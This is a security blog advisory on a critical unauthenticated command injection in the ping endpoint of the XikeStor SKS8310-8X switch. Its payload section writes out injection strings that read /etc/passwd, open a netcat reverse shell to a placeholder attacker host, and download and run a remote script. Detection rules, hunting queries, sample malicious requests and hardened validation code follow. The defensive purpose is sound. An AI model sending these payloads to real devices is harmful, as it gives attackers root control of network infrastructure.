CVE-2026-25070: Critical Command Injection Flaw in XikeStor SKS8310-8X Switch Enables Unauthenticated Remote Root Access

CVE-2026-25070 – XikeStor SKS8310-8X Switch OS Command Injection

CVE ID: CVE-2026-25070
Product: XikeStor SKS8310-8X Managed Network Switch
Affected Versions: Firmware 1.04.B07 and earlier
Vulnerability Type: OS Command Injection
CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
Severity: Critical
CVSS v3.x Score: 9.3 (Critical)
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: High
Exploitability: High
Exploit Availability: No widely distributed exploit framework has been observed yet; however, exploitation is considered straightforward because the endpoint performs neither input validation nor authentication.
Authentication Requirement: Not required
Impact: Unauthenticated Remote Code Execution as root user


Overview

A critical vulnerability has been identified in the XikeStor SKS8310-8X managed network switch firmware. The flaw exists within the device’s web management interface and allows unauthenticated remote attackers to execute arbitrary operating system commands.

The vulnerability originates from improper input validation in the Ping diagnostic function exposed through the endpoint:

/goform/PingTestSet

This endpoint accepts user-supplied input through the destIp parameter. Instead of validating or sanitizing the input, the firmware passes the value directly into an operating system command used to perform a ping operation.

Because the command is executed by the system shell, specially crafted input containing shell operators can cause additional commands to be executed. As the web service on the switch runs with root privileges, any injected command is also executed with root level permissions, leading to full compromise of the device.


Affected Component

Component: Web management interface
Endpoint:

/goform/PingTestSet

Vulnerable Parameter:

destIp

This parameter is expected to contain an IP address used for network connectivity testing. However, due to the lack of sanitization, shell control characters can be injected.


Technical Root Cause

The vulnerability is caused by unsafe command execution logic in the ping testing feature.

In the firmware, the user-supplied IP address is concatenated into a shell command similar to:

ping <destIp>

The command is then executed through a system shell call rather than by invoking ping directly with an argument vector. Because input validation is missing, shell metacharacters in the value are interpreted by that shell as command separators.

Examples of such characters include:

;
|
&&
||
`
$

When one of these operators is included within the input, additional commands are executed after the ping command.

Because the switch firmware runs with root privileges, the attacker gains full control over the underlying Linux system.
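The same handler with the missing step in place, as an added example that is not the switch firmware's code (the advisory does not show the real handler; function names here are hypothetical, and only destIp and the endpoint come from the page): accept only a value that parses as an IP address, then pass it to ping as an argument vector so that no shell is involved at all.

```python
"""Added example, not the switch firmware's code: the allowlist validation
that /goform/PingTestSet is missing, followed by a ping invocation that
never passes through a shell. Handler names are hypothetical."""
import ipaddress
import subprocess
from typing import List, Optional


def validate_dest_ip(raw: str) -> Optional[str]:
    """Return the canonical IP literal, or None if `raw` is not exactly one.

    Allowlisting (accept only what parses as an address) rejects every
    shell operator the advisory lists, plus quotes, spaces, newlines and
    percent-encoded variants, without needing a denylist of characters.
    """
    if not raw or len(raw) > 45:  # 45 = longest textual IPv6 form
        return None
    try:
        return str(ipaddress.ip_address(raw))
    except ValueError:
        return None


def build_ping_argv(dest_ip: str, count: int = 3) -> List[str]:
    """Argument vector for ping, with the address as the last argument.

    Raises ValueError on anything that is not a single IP. Because this
    is an argv list and not a command string, ';', '|', '&&', backticks
    and '$' would be literal bytes in one argument even if they got here.
    """
    valid = validate_dest_ip(dest_ip)
    if valid is None:
        raise ValueError("destIp must be a single IPv4 or IPv6 address")
    return ["ping", "-c", str(count), valid]


def ping_test_set(dest_ip: str) -> int:
    """Hardened counterpart of the vulnerable handler: validate, then run
    ping with execve semantics (shell=False). Returns ping's exit status."""
    return subprocess.run(build_ping_argv(dest_ip), shell=False, check=False).returncode
```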


Vulnerability Type

The vulnerability falls under OS Command Injection.

This class of vulnerability occurs when:

  1. User controlled input is inserted into a command.
  2. The command is executed by the operating system.
  3. Input validation is not performed.
  4. Shell metacharacters are interpreted by the system shell.

Such flaws frequently appear in embedded devices and IoT firmware, where diagnostic tools such as ping, traceroute, or network scans are implemented without secure input filtering.


Exploitation Scenario

Exploitation can be performed remotely if the management interface of the switch is reachable.

The attack process typically follows these steps:

  1. The attacker identifies a network-exposed XikeStor SKS8310-8X switch.
  2. The management interface is accessed through HTTP.
  3. A crafted HTTP request is sent to /goform/PingTestSet.
  4. The attacker injects malicious shell syntax inside the destIp parameter.
  5. The injected command is executed by the device operating system.

Because authentication is not required, the vulnerability can be exploited without credentials.


Proof-of-Concept Payload (Educational Use Only)

The following payload examples demonstrate how command injection may occur.

Basic command execution

destIp=8.8.8.8;id

Expected result:

ping 8.8.8.8
id

The id command is executed after the ping command.


System information retrieval

destIp=8.8.8.8;uname -a

Reading sensitive files

destIp=8.8.8.8;cat /etc/passwd

Reverse shell attempt

destIp=8.8.8.8;nc attacker-ip 4444 -e /bin/sh

Remote payload download

destIp=8.8.8.8;wget http://attacker/payload.sh -O /tmp/payload.sh;sh /tmp/payload.sh

These payloads illustrate how attackers can move from simple command execution to persistent compromise.


Potential Impact

Successful exploitation can result in complete control over the network switch.

Possible consequences include:

Network manipulation

Attackers may modify switch configuration such as VLAN assignments, routing tables, or port settings.

Traffic interception

Since the switch controls packet forwarding, traffic passing through the device may be intercepted or redirected.

Lateral movement

Once compromised, the switch can be used as a pivot point for attacking internal network systems.

Persistent backdoor

Malicious scripts or binaries may be placed on the device to maintain long-term access.

Network disruption

Attackers may disable switching functions, modify configurations, or reboot the device, resulting in service outages.


MITRE ATT&CK Mapping

T1190 – Exploit Public-Facing Application
The vulnerable management interface can be accessed remotely and exploited through crafted HTTP requests.

T1059 – Command and Scripting Interpreter
Injected shell commands allow attackers to execute arbitrary system commands.

T1105 – Ingress Tool Transfer
Payloads may download additional malicious tools onto the switch.

T1046 – Network Service Discovery
Compromised switches may scan internal networks to discover additional targets.

T1071 – Application Layer Protocol
Communication with attacker infrastructure may occur using HTTP or DNS.


Detection

Detection should focus on abnormal requests targeting the Ping diagnostic endpoint and the presence of shell operators in parameters.

Indicators include:

  • Requests targeting /goform/PingTestSet
  • Requests containing shell metacharacters in destIp
  • Unexpected outbound connections initiated by the switch
  • Suspicious command execution patterns

Common injection indicators:

;
|
&&
||
`
$

Educational Suspicious Requests

POST /goform/PingTestSet
destIp=8.8.8.8;id

POST /goform/PingTestSet
destIp=1.1.1.1|whoami

POST /goform/PingTestSet
destIp=8.8.8.8&&cat /etc/passwd
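A small detector that applies the indicator list and the sample requests above to request records, as an added example that is not part of the advisory or of any vendor tooling; the record layout (method, URI, body) is assumed. It percent-decodes the destIp value before matching, which a raw-byte pattern match does not, and additionally flags any destIp that does not parse as a bare IP address.

```python
"""Added example (not advisory or vendor code): applies the indicators above
to HTTP request records; record fields assumed, endpoint, parameter and
operator list taken from the advisory."""
import ipaddress
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

PING_ENDPOINT = "/goform/PingTestSet"
# Operators from the advisory; a lone '&' delimits form fields, so only '&&' is matched.
SHELL_OPERATORS = (";", "|", "&&", "||", "`", "$")
# '&' starts a new field only when followed by 'name=', so an injected
# '&&cmd' stays attached to destIp instead of being split off and lost.
FIELD_BOUNDARY = re.compile(r"&(?=[A-Za-z_][A-Za-z0-9_]*=)")

def extract_dest_ip(body: str) -> Optional[str]:
    """Decoded destIp value from a form-encoded body, or None if absent."""
    idx = body.find("destIp=")
    if idx < 0:
        return None
    rest = FIELD_BOUNDARY.split(body[idx + len("destIp="):], maxsplit=1)[0]
    return unquote_plus(rest)  # %3B and '+' are decoded before matching

def classify_request(method: str, uri: str, body: str) -> List[str]:
    """Reasons a request matches the CVE-2026-25070 pattern; [] if none."""
    if uri.split("?", 1)[0] != PING_ENDPOINT:
        return []
    dest = extract_dest_ip(body or "")
    if dest is None:
        return []
    reasons = [f"shell operator {op!r} in destIp" for op in SHELL_OPERATORS if op in dest]
    try:
        ipaddress.ip_address(dest.strip())
    except ValueError:  # anything that is not a bare IP, encoded or not
        reasons.append("destIp is not a plain IP literal")
    return reasons

# Constructed (method, uri, body) records mirroring the advisory's sample
# requests, plus one benign and one unrelated request.
SAMPLE_REQUESTS = [
    ("POST", "/goform/PingTestSet", "destIp=8.8.8.8&count=4"),
    ("POST", "/goform/PingTestSet", "destIp=8.8.8.8;id"),
    ("POST", "/goform/PingTestSet", "destIp=1.1.1.1|whoami"),
    ("POST", "/goform/PingTestSet", "destIp=8.8.8.8&&cat+/etc/passwd"),
    ("POST", "/goform/PingTestSet", "destIp=8.8.8.8%3Bid"),
    ("GET", "/goform/SystemInfo", ""),
]

def scan(requests) -> Dict[int, List[str]]:
    return {i: r for i, req in enumerate(requests) if (r := classify_request(*req))}
```

A record whose destIp fails IP parsing but contains none of the listed operators is the one worth a manual look, since it may carry a separator or encoding the list does not cover.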

Detection Rules

IDS / IPS Rule (Suricata)

# pcre is scoped to the HTTP request body (/P), which is where destIp is carried;
# the trailing backslashes let the rule span several lines in a rules file.
alert http any any -> any any ( \
msg:"XikeStor SKS8310-8X PingTestSet Command Injection Attempt"; \
flow:to_server,established; \
content:"/goform/PingTestSet"; \
http_uri; \
pcre:"/destIp=.*(;|\||&&|`|\$)/P"; \
classtype:web-application-attack; \
sid:90025070; \
rev:1; \
)

Network Detection Rule (Snort)

# Same body scoping (/P); port 80 assumes the management interface listens there.
alert tcp any any -> any 80 ( \
msg:"XikeStor PingTestSet Command Injection"; \
flow:to_server,established; \
content:"/goform/PingTestSet"; \
http_uri; \
pcre:"/destIp=.*(;|\||&&)/P"; \
sid:10025070; \
rev:1; \
)

Log Source

The following log sources are useful for identifying exploitation attempts:

Web Management Logs

  • HTTP access logs
  • Administrative activity logs

Network Security Logs

  • IDS / IPS alerts
  • Firewall logs
  • Network traffic inspection

Device System Logs

  • Process execution logs
  • System command logs
  • Configuration change logs

Network Monitoring

  • Unexpected outbound connections from network infrastructure devices
  • DNS queries initiated by the switch

Threat Hunting Queries

Splunk Query

index=network_logs
uri="/goform/PingTestSet"
| search destIp="*;*" OR destIp="*|*" OR destIp="*&&*"

Elastic / KQL Query

url.path : "/goform/PingTestSet" and 
(request.body : "*;*" or request.body : "*|*" or request.body : "*&&*")

Generic SIEM Query

url="/goform/PingTestSet"
AND (request_body LIKE "%;%" OR request_body LIKE "%|%" OR request_body LIKE "%&&%")

Indicators of Compromise

Security teams should investigate if any of the following signs are observed:

  • Unknown outbound connections from the switch
  • Unexpected system processes running on the device
  • Unknown configuration modifications
  • Newly created administrator accounts
  • Suspicious shell commands executed by the device

Mitigation

Immediate defensive measures should include:

  • Restricting management interface access to internal administrative networks only
  • Blocking external access to switch management ports
  • Monitoring HTTP requests targeting diagnostic endpoints
  • Implementing network segmentation for infrastructure devices

Regular firmware updates should also be applied to prevent exploitation.


Patch / Upgrade

The vulnerability has been addressed through firmware updates that introduce proper input validation for the Ping diagnostic feature.

Administrators should upgrade affected devices to a secure firmware version newer than 1.04.B07.

Official firmware information and upgrade guidance:

https://openwrt.org/toh/xikestor/sks8310-8x


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.